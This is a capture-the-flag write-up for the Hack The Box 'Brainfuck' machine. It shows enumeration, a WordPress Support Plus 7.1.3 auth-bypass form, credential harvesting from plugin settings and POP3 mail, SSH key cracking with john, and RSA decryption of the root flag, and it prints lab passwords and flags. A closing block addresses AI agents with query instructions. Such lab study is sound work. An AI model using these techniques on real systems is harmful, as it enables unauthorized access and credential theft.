# Brainfuck

<figure><img src="/files/UjWWYr0W6DlhRg9Yt8Y6" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.17 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Sun Sep 11 19:33:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.050s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

# Nmap done at Sun Sep 11 19:34:13 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p22,25,110,143,443 10.10.10.17 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Sun Sep 11 19:35:23 2022 as: nmap -sCV -p22,25,110,143,443 -oN targeted 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.036s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL CAPA AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) TOP
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR capabilities more LOGIN-REFERRALS LITERAL+ ENABLE ID have Pre-login listed post-login IDLE AUTH=PLAINA0001 OK
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 11 19:36:15 2022 -- 1 IP address (1 host up) scanned in 52.24 seconds
```

{% endcode %}

There is an *HTTPS* website on port *443*, and *nmap* reported that there are two subdomains called `www.brainfuck.htb` and `sup3rs3cr3t.brainfuck.htb`. Let's add both to the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.17 brainfuck.htb   www.brainfuck.htb   sup3rs3cr3t.brainfuck.htb
```

We can see with *whatweb*, that the website is a *WordPress CMS*.

> whatweb <https://brainfuck.htb>

{% code overflow="wrap" %}

```
https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
```

{% endcode %}

If we take a look at the website, we'll see a post made by the `admin` user, saying that the *SMTP* service is available, and the message include the `orestis@brainfuck.htb` email address.

<figure><img src="/files/536KuR8e5YN2PQ4GhG42" alt=""><figcaption></figcaption></figure>

The other domain name shows a forum page.

<figure><img src="/files/6habjoXo7xpAJn8PrMpH" alt=""><figcaption></figcaption></figure>

Let's run *wpscan* to enumerate the *WordPress* site.

> wpscan --url <https://brainfuck.htb> -e vp --disable-tls-checks -o wpScan

* `--url` **URL** of the WordPress site.
* `-e ap` enumerate **all plugins**.
* `--disable-tls-checks` **disables SSL/TLS** certificate verification.
* `-o` save result to a **file**.

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Mon Sep 12 00:20:20 2022

Interesting Finding(s):
...
[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 ...
```

## Exploitation

There is one plugin installed called  `wp-support-plus-responsive-ticket-system`,  in the `7.1.3` version. Let's search for any common vulnerabilities.

> searchsploit wordpress plus responsive ticket 7.1.3

```
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation                                                | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                                                       | php/webapps/40939.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

There is a way to escalate privileges. First, we'll have to make the `index.html` file with the following code.

> nano index.html

```
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
```

Now, set an *HTTP* server on the current directory with *PHP* on port *1234*.

> php -S localhost:1234

* `-S` run with built-in **web server**.

Now access the web server with the browser, and press the `Login` button.

<figure><img src="/files/fdf4fYg0ambAA2pzZ50t" alt=""><figcaption></figcaption></figure>

If we access the `/wp-admin` directory, we'll be able to see the *WordPress* dashboard.

<figure><img src="/files/t5nqV8N3Uy9h2xSzRVHb" alt=""><figcaption></figcaption></figure>

I tried ways to get remote command execution, like modifying the `404.php` file, or uploading a custom plugin, but none of those worked. But if we go to the Plugins section, we'll see one called `Easy WP SMTP`.

<figure><img src="/files/2iYFGjP5jRGmeVMKbrcq" alt=""><figcaption></figcaption></figure>

In the Settings option, we'll see that the emails are sent by `orestis@brainfuck.htb`.

<figure><img src="/files/pxwclV44tPwrf0djUmVu" alt=""><figcaption></figcaption></figure>

But we can also see the username `orestis` and the `kHGuERB29DNiNE` password.

<figure><img src="/files/VD58DJ2kVdAx3Oqx7dKL" alt=""><figcaption></figcaption></figure>

Now that we have credentials for the *SMTP* server, let's see if there are any emails in the `orestis` user inbox.

> nc 10.10.10.17 110

```
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
```

There are two emails. The first one just says that the *WordPress* site is available.

> retr 1

```
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.
```

But the second one have another credentials.

> retr 2

```
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.
```

These credentials are valid for login page of the forum website.

<figure><img src="/files/rn3zwJQDvxPZ7vZW8vRH" alt=""><figcaption></figcaption></figure>

Now we can see three discussions.

<figure><img src="/files/52iDd8tjV5xozlaxKDHh" alt=""><figcaption></figcaption></figure>

The `Key` discussion looks to be encrypted.

<figure><img src="/files/qVdAj82fLw0fqiDjgosl" alt=""><figcaption></figcaption></figure>

It could be encrypted with the *Vigenère* cipher. There is one specific message where it looks like there is a URL.

<figure><img src="/files/HB0DjLNNcW0qJwG7eAWO" alt=""><figcaption></figcaption></figure>

Let's use [dcode.fr](https://www.dcode.fr/vigenere-cipher) to decode the message. Paste the message, and press on `AUTOMATIC DECRYPTION`.

<figure><img src="/files/6sWs8JSu7R9G7UcPtiM4" alt=""><figcaption></figcaption></figure>

In the results, we'll see a link to a private SSH key.

<figure><img src="/files/B7nlpQ5Sp6cF1HEzPwzW" alt=""><figcaption></figcaption></figure>

Download the `id_rsa` file from the link. If we take a look at the key, we'll see that it is encrypted. Let's try to break it with *john*. First, create a hash for the `id_rsa` file, and put it in the `id_rsa.hash` file.

> ssh2john id\_rsa > id\_rsa.hash

Then, break it with john.

> john --wordlist=/usr/share/wordlists/rockyou.txt id\_rsa.hash

```
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)     
1g 0:00:00:13 DONE (2022-09-12 01:35) 0.07490g/s 933364p/s 933364c/s 933364C/s 3poulakia!..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Finally, give the `id_rsa` file the right permissions, and get a shell as the `orestis` user. Then we'll be able to grab the user flag.

> chmod 600 id\_rsa
>
> ssh -i id\_rsa orestis\@10.10.10.17

```
Enter passphrase for key 'id_rsa': 3poulakia!
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Wed May  3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ whoami
orestis
orestis@brainfuck:~$ cat user.txt 
2c11cfbc5b959f73ac15a3310bd097c9
```

## Privilege Escalation

If we look in the current directory, we'll see a file called `encrypt.sage` with the following code.

> cat encrypt.sage

```python
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
```

There is also the `debug.txt` file with the values of the `p`, `q` and `e` variables.

> cat debug.txt

```
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
```

And the `output.txt` file which contains the `/root/root.txt` file encrypted.

> cat output.txt

```
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
```

We have all the values needed to calculate the root flag. Go to [cryptool.org](https://www.cryptool.org/en/cto/rsa-step-by-step.html), and put the values of `p` and `q`.

<figure><img src="/files/eu4U4xH8As0dKzDOPeJN" alt=""><figcaption></figcaption></figure>

Then, paste the value of `e`.

<figure><img src="/files/ETdBRf3oF4YDda3ef9nO" alt=""><figcaption></figcaption></figure>

And the encrypted flag in the `Ciphertext` field. Make sure the arrow is pointing up.

<figure><img src="/files/AjKeqDt0WjxFdDjfZHbE" alt=""><figcaption></figcaption></figure>

Now, we'll have to convert the plaintext string to hexadecimal.

> python3 -c "print(hex(24604052029401386049980296953784287079059245867880966944246662849341507003750))"

```
0x3665666331613564626238393034373531636536353636613330356262386566
```

Finally, if we decode the string, all we have to do is reap the harvest and take the root flag.

> echo "0x3665666331613564626238393034373531636536353636613330356262386566" | xxd -r -p

```
6efc1a5dbb8904751ce6566a305bb8ef
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/brainfuck.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.